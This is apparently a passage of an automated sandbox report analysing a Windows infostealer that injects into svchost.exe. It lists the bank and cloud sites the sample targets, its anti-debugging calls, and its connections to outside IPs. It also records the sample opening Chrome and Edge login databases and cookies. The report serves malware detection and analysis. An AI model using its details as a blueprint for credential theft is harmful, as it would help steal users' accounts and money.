                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599750Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599627Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599500Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599387Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599276Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599168Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599057Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598938Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598813Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598688Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598201Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598078Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597963Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597844Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596498Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596266Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596141Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596032Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595907Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595782Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595672Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595563Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595438Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595313Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595188Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595063Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594719Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594500Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594391Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594280Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594157Jump to behavior
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: svchost.exe, 00000001.00000002.3764951839.000000000346B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: svchost.exe, 00000001.00000003.1728428186.0000000006D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: C:\Users\user\Desktop\8JVG9KELay.exeAPI call chain: ExitProcess graph end nodegraph_0-98814
                Source: C:\Users\user\Desktop\8JVG9KELay.exeAPI call chain: ExitProcess graph end nodegraph_0-98883
                Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A9698 LdrInitializeThunk,1_2_087A9698
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008541FD BlockInput,0_2_008541FD
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007E3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007E3B4C
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00815CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00815CCC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0085C304 LoadLibraryA,GetProcAddress,0_2_0085C304
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007D3470 mov eax, dword ptr fs:[00000030h]0_2_007D3470
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007D34D0 mov eax, dword ptr fs:[00000030h]0_2_007D34D0
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007D1E70 mov eax, dword ptr fs:[00000030h]0_2_007D1E70
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008381F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_008381F7
                Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0080A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0080A395
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0080A364 SetUnhandledExceptionFilter,0_2_0080A364
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040E61C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00416F6A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004123F1 SetUnhandledExceptionFilter,1_2_004123F1
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 158.101.44.242 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.80.1 443Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 31FE008Jump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00838C93 LogonUserW,0_2_00838C93
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007E3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007E3B4C
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007E4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007E4A35
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00844EC9 mouse_event,0_2_00844EC9
                Source: C:\Users\user\Desktop\8JVG9KELay.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8JVG9KELay.exe"Jump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008381F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_008381F7
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00844C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00844C03
                Source: 8JVG9KELay.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 8JVG9KELay.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0080886B cpuid 0_2_0080886B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,1_2_00417A20
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008150D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_008150D7
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00822230 GetUserNameW,0_2_00822230
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0081418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0081418A
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007E4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007E4AFE
                Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000001.00000002.3766303344.0000000005B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTR
                Source: Yara matchFile source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: 8JVG9KELay.exeBinary or memory string: WIN_81
                Source: 8JVG9KELay.exeBinary or memory string: WIN_XP
                Source: 8JVG9KELay.exeBinary or memory string: WIN_XPe
